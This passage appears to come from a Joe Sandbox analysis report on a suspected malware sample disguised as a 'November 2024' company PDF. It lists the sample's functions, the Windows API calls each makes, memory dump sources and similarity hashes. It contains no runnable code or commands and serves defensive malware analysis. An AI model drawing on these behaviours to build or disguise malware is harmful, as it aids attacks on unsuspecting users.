                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0078D6CE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1378193009-0
                                                                                                                      • Opcode ID: ffeb508cf1b732501988f086e6f10bab6023652950fcd882079ec10eeed5d37e
                                                                                                                      • Instruction ID: f4e9c36a649ed4d68c4c08f6c57ac831eda8478508fd8797f4118622032a95f2
                                                                                                                      • Opcode Fuzzy Hash: ffeb508cf1b732501988f086e6f10bab6023652950fcd882079ec10eeed5d37e
                                                                                                                      • Instruction Fuzzy Hash: DF210A705447889FEB329B24DC49BE7BBECAF01319F00409EE69E56181D7B81E88CB51
                                                                                                                      Function 007B40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007B40D1
                                                                                                                      • _memset.LIBCMT ref: 007B40F2
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007B4144
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 007B414D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1157408455-0
                                                                                                                      • Opcode ID: fb14be002550a8f8a5d56ce72a00ba572f90e1f784fb9801547e590268e4918a
                                                                                                                      • Instruction ID: f49cfec486091bdee627f7488fe0fbecc47c479e1ed4cf5473dd6b322a738334
                                                                                                                      • Opcode Fuzzy Hash: fb14be002550a8f8a5d56ce72a00ba572f90e1f784fb9801547e590268e4918a
                                                                                                                      • Instruction Fuzzy Hash: C811987590122C7AD7305AA59C4DFEBBB7CEB44760F104196F908D7180D6744E808BA4
                                                                                                                      Function 007C667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7B20,?,?,00000000), ref: 00755B8C
                                                                                                                        • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7B20,?,?,00000000,?,?), ref: 00755BB0
                                                                                                                      • gethostbyname.WSOCK32(?,?,?), ref: 007C66AC
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 007C66B7
                                                                                                                      • _memmove.LIBCMT ref: 007C66E4
                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 007C66EF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1504782959-0
                                                                                                                      • Opcode ID: 7290387a05b7e3a77a836f0a3ec408b2b5805fb116f532d4e1cfed35d18539da
                                                                                                                      • Instruction ID: a2221a05c97807613c7602ea4d253e070ded1c8d95aa56669f2864bbcbb6e211
                                                                                                                      • Opcode Fuzzy Hash: 7290387a05b7e3a77a836f0a3ec408b2b5805fb116f532d4e1cfed35d18539da
                                                                                                                      • Instruction Fuzzy Hash: D9119375900508EFCB00EBA4DD9ADEE77B8BF04311B048129F906A7161DF78AF04DBA1
                                                                                                                      Function 007A9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 007A9043
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A9055
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A906B
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A9086
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: b2ec43b8292275d7a6d680c9bb51f910e9258b5c544ca2b1e551a806265ba7e7
                                                                                                                      • Instruction ID: b255b29c42a3f2ff5696638f70787a636332a005dea8ce401b7c47a76626ff85
                                                                                                                      • Opcode Fuzzy Hash: b2ec43b8292275d7a6d680c9bb51f910e9258b5c544ca2b1e551a806265ba7e7
                                                                                                                      • Instruction Fuzzy Hash: 75115E79901219FFDB10DFA5CC84EAEFB74FB48350F204195EA04B7290D671AE10DB94
                                                                                                                      Function 00751290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 007512D8
                                                                                                                      • GetClientRect.USER32(?,?), ref: 0078B84B
                                                                                                                      • GetCursorPos.USER32(?), ref: 0078B855
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0078B860
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4127811313-0
                                                                                                                      • Opcode ID: fbf0ea78ba115174375f1edf08bf0d92a0b043aeebcbe76238e613f2cee69d44
                                                                                                                      • Instruction ID: b9e25618fcf86c4740fd974aff9d66b6eafff81fe07251abb4a33595b1a631f6
                                                                                                                      • Opcode Fuzzy Hash: fbf0ea78ba115174375f1edf08bf0d92a0b043aeebcbe76238e613f2cee69d44
                                                                                                                      • Instruction Fuzzy Hash: 49112B35601019FFCB00DF94D889AFE77B8FB05302F404456F942E7151D778AA55CBA5
                                                                                                                      Function 007B1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B166F
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B1694
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B169E
                                                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B16D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2875609808-0
                                                                                                                      • Opcode ID: 0d3c440c35f1b8aa9b414f2205d77410b70cfb60fee0648ceeccc68110e8281d
                                                                                                                      • Instruction ID: 7dc9bea4128cc5b0ab61599990301dab7ec2c55e6a91e0d6c7104fadf6cb48cb
                                                                                                                      • Opcode Fuzzy Hash: 0d3c440c35f1b8aa9b414f2205d77410b70cfb60fee0648ceeccc68110e8281d
                                                                                                                      • Instruction Fuzzy Hash: 94115A31C0152CEBCF009FA5D858BEEBB78FF09751F848056E941B2240CF3955608B96
                                                                                                                      Function 00787207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                      • Instruction ID: 9aa422e2f0607389776573d5b88dead8f402113a87a0a07659d03b4a254e7c37
                                                                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                      • Instruction Fuzzy Hash: DE01433608414AFBCF5A6E84CC458EE3F72BF59351B648515FA1998031D33BC9B1EB81
                                                                                                                      Function 007DB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 007DB59E
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 007DB5B6
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 007DB5DA
                                                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007DB5F5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 357397906-0
                                                                                                                      • Opcode ID: 10824d24211a97f6c2b77614808fc345265d0b7faf6651d70acc2bdd66947362
                                                                                                                      • Instruction ID: d310bb6b642409b2e54993d1b142aff6d1dc8537dfa5d1333ff0cf95f9bf342e
                                                                                                                      • Opcode Fuzzy Hash: 10824d24211a97f6c2b77614808fc345265d0b7faf6651d70acc2bdd66947362
                                                                                                                      • Instruction Fuzzy Hash: 511166B5D00209EFDB01CF99D4449EEFBB5FB08310F108166E955E3620D735AA618F50
                                                                                                                      Function 007DB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007DB8FE
                                                                                                                      • _memset.LIBCMT ref: 007DB90D
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00817F20,00817F64), ref: 007DB93C
                                                                                                                      • CloseHandle.KERNEL32 ref: 007DB94E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3277943733-0
                                                                                                                      • Opcode ID: c77a563af195d7fdcb1079f7fa620fb2d91a260dadc99d3f7475d85561ed07cb
                                                                                                                      • Instruction ID: f362c59e6495b2b1db75f86217fa207c27d28053941eb8d2465ca231bebb9a71
                                                                                                                      • Opcode Fuzzy Hash: c77a563af195d7fdcb1079f7fa620fb2d91a260dadc99d3f7475d85561ed07cb
                                                                                                                      • Instruction Fuzzy Hash: 85F05EB2544300BBE6102765AC09FFB3AADFF08794F008025FB09D5292DB79990187A9
                                                                                                                      Function 007B6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 007B6E88
                                                                                                                        • Part of subcall function 007B794E: _memset.LIBCMT ref: 007B7983
                                                                                                                      • _memmove.LIBCMT ref: 007B6EAB
                                                                                                                      • _memset.LIBCMT ref: 007B6EB8
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 007B6EC8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 48991266-0
                                                                                                                      • Opcode ID: 4c1110f9ea4ff7262569a617c75638654f5ed87af0fbf0471c278fbfeade66d3
                                                                                                                      • Instruction ID: 72fe1ae14348ee338f6c09307bf4c1809ff6c012ffa408556d3f52346de034a9
                                                                                                                      • Opcode Fuzzy Hash: 4c1110f9ea4ff7262569a617c75638654f5ed87af0fbf0471c278fbfeade66d3
                                                                                                                      • Instruction Fuzzy Hash: A7F05E3A200200EBCF016F55DC89F8ABB2AFF45360B04C061FE095E22AC739A911DBB5
                                                                                                                      Function 007DC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007512F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0075134D
                                                                                                                        • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075135C
                                                                                                                        • Part of subcall function 007512F3: BeginPath.GDI32(?), ref: 00751373
                                                                                                                        • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075139C
                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007DC030
                                                                                                                      • LineTo.GDI32(00000000,?,?), ref: 007DC03D
                                                                                                                      • EndPath.GDI32(00000000), ref: 007DC04D
                                                                                                                      • StrokePath.GDI32(00000000), ref: 007DC05B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1539411459-0
                                                                                                                      • Opcode ID: 658ff77657b94eac6e613fe9009b9572dfcb7b5ed41be0fb211a46e1f9f3cbb3
                                                                                                                      • Instruction ID: 7c8a3a972f8f3255e633783811d3b50b3485c065f8b9d6840bc04c4788fdca93
                                                                                                                      • Opcode Fuzzy Hash: 658ff77657b94eac6e613fe9009b9572dfcb7b5ed41be0fb211a46e1f9f3cbb3
                                                                                                                      • Instruction Fuzzy Hash: 96F05E3114225AFBDB136F54AC0AFCE3F69BF05311F18C012FA12621E2C7B95665CB99
                                                                                                                      Function 007AA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007AA399
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 007AA3AC
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 007AA3B3
                                                                                                                      • AttachThreadInput.USER32(00000000), ref: 007AA3BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2710830443-0
                                                                                                                      • Opcode ID: a8bc07656948f4a814a5490ef905568b31fcfd47c2f4c424ce44d003cfe2be49
                                                                                                                      • Instruction ID: fbc6b7cf1626eba363c444e1bda8ec10f3ebbe660d365946df2e0d7181839f90
                                                                                                                      • Opcode Fuzzy Hash: a8bc07656948f4a814a5490ef905568b31fcfd47c2f4c424ce44d003cfe2be49
                                                                                                                      • Instruction Fuzzy Hash: 83E0C931546228BADB205FA2DC0DEE77F6CEF167A1F048126F50A95460C77AC540DBA5
                                                                                                                      Function 00752218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000008), ref: 00752231
                                                                                                                      • SetTextColor.GDI32(?,000000FF), ref: 0075223B
                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00752250
                                                                                                                      • GetStockObject.GDI32(00000005), ref: 00752258
                                                                                                                      • GetWindowDC.USER32(?,00000000), ref: 0078C0D3
                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0078C0E0
                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0078C0F9
                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0078C112
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0078C132
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0078C13D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1946975507-0
                                                                                                                      • Opcode ID: 6a289215e7156f1b18ac62af9f3754e43af0585235b2a9625f07f1754f2269dd
                                                                                                                      • Instruction ID: 592ed5365718fc2e65e0901702fcf2050a13c80c7e841c288c9780cd2b08501d
                                                                                                                      • Opcode Fuzzy Hash: 6a289215e7156f1b18ac62af9f3754e43af0585235b2a9625f07f1754f2269dd
                                                                                                                      • Instruction Fuzzy Hash: 3FE06531540248EADB215F64FC0D7D83B20EB05332F04C367FA6A880E187764594DB21
                                                                                                                      Function 007A8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentThread.KERNEL32 ref: 007A8C63
                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,007A882E), ref: 007A8C6A
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007A882E), ref: 007A8C77
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,007A882E), ref: 007A8C7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3974789173-0
                                                                                                                      • Opcode ID: 0532320b2fd92ec9a0bb3672ed73ab8f17fba454792c34f656e0c0ec10d8b32c
                                                                                                                      • Instruction ID: e4c69986a3c7c95877fe52438789d1ca0f5266c372e07945ba9716d33610f31b
                                                                                                                      • Opcode Fuzzy Hash: 0532320b2fd92ec9a0bb3672ed73ab8f17fba454792c34f656e0c0ec10d8b32c
